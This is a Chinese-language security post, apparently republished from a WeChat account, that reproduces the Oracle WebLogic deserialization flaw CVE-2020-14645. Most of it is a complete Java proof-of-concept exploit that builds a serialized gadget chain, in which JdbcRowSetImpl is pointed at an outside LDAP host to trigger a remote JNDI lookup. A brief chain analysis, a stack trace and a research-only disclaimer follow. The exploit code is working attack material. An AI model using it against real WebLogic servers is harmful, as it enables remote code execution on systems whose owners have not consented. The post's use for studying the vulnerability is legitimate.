Oracle WebLogic Server :12.2.1.4.0
POC:
import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import com.tangosol.util.extractor.UniversalExtractor;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.sql.SQLException;
import java.util.PriorityQueue;
public class cve_2020_14645 {
public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Field getField(Class<?> clazz, String fieldName) {
Field field = null;
try {
field = clazz.getDeclaredField(fieldName);
field.setAccessible(true);
} catch (NoSuchFieldException var4) {
if (clazz.getSuperclass() != null) {
field = getField(clazz.getSuperclass(), fieldName);
}
}
return field;
}
public static void main(String[] args) throws Exception {
JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
jdbcRowSet.setDataSourceName("ldap://lqvfihdamd.dgrh3.cn");
UniversalExtractor universalExtractor = new UniversalExtractor();
setFieldValue(universalExtractor,"m_sName","databaseMetaData");
setFieldValue(universalExtractor,"m_aoParam",new Object[]{});
ExtractorComparator extractorComparator = new ExtractorComparator(universalExtractor);
PriorityQueue priorityQueue = new PriorityQueue(extractorComparator);
setFieldValue(priorityQueue,"queue",new Object[]{jdbcRowSet,"123"});
setFieldValue(priorityQueue,"size",2);
ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("oracle/cve-2020_14645.ser"));
oos.writeObject(priorityQueue);
oos.close();
ObjectInputStream ois = new ObjectInputStream(new FileInputStream("oracle/cve-2020_14645.ser"));
ois.readObject();
}
}
利用链:
PriorityQueue.readObject()
PriorityQueue.heapify()
PriorityQueue.siftDown()
PriorityQueue.siftDownUsingComparator()
ExtractorComparator.compare()
UniversalExtractor.extract()
UniversalExtractor.extractComplex()
Mehotd.invoke()
JdbcRowSetImpl.getDatabaseMetaData()
sink:(method.invoke())
com.tangosol.util.extractor.UniversalExtractor#extractComplex()存在反射调用,能够m_sName属性值去获取对应的get方法与is方法,例如m_sName为databaseMetaData,那么就会尝试获取对应的getDatabaseMetaData的method并反射调用,参数值也可控,为m_aoParam
source:
到了com.tangosol.util.extractor.UniversalExtractor#extract()就很常见了,com.tangosol.util.comparator.ExtractorComparator.compare() ==> com.tangosol.util.extractor.UniversalExtractor#extract()
其实source都是cve-2020-2883的前半部分
至此,完整的利用链已经完成。
lookup:417, InitialContext (javax.naming)
connect:624, JdbcRowSetImpl (com.sun.rowset)
getDatabaseMetaData:4004, JdbcRowSetImpl (com.sun.rowset)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
extractComplex:432, UniversalExtractor (com.tangosol.util.extractor)
extract:175, UniversalExtractor (com.tangosol.util.extractor)
compare:71, ExtractorComparator (com.tangosol.util.comparator)
siftDownUsingComparator:721, PriorityQueue (java.util)
siftDown:687, PriorityQueue (java.util)
heapify:736, PriorityQueue (java.util)
readObject:795, PriorityQueue (java.util)
invoke0:-1, NativeMethodAccessorImpl (sun.reflect)
invoke:62, NativeMethodAccessorImpl (sun.reflect)
invoke:43, DelegatingMethodAccessorImpl (sun.reflect)
invoke:497, Method (java.lang.reflect)
invokeReadObject:1058, ObjectStreamClass (java.io)
readSerialData:1900, ObjectInputStream (java.io)
readOrdinaryObject:1801, ObjectInputStream (java.io)
readObject0:1351, ObjectInputStream (java.io)
readObject:371, ObjectInputStream (java.io)
main:63, cve_2020_14645 (cve2020.cve_2020_14645)
原文始发于微信公众号(路旅安全):Weblogic CVE-2020-14645漏洞复现分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论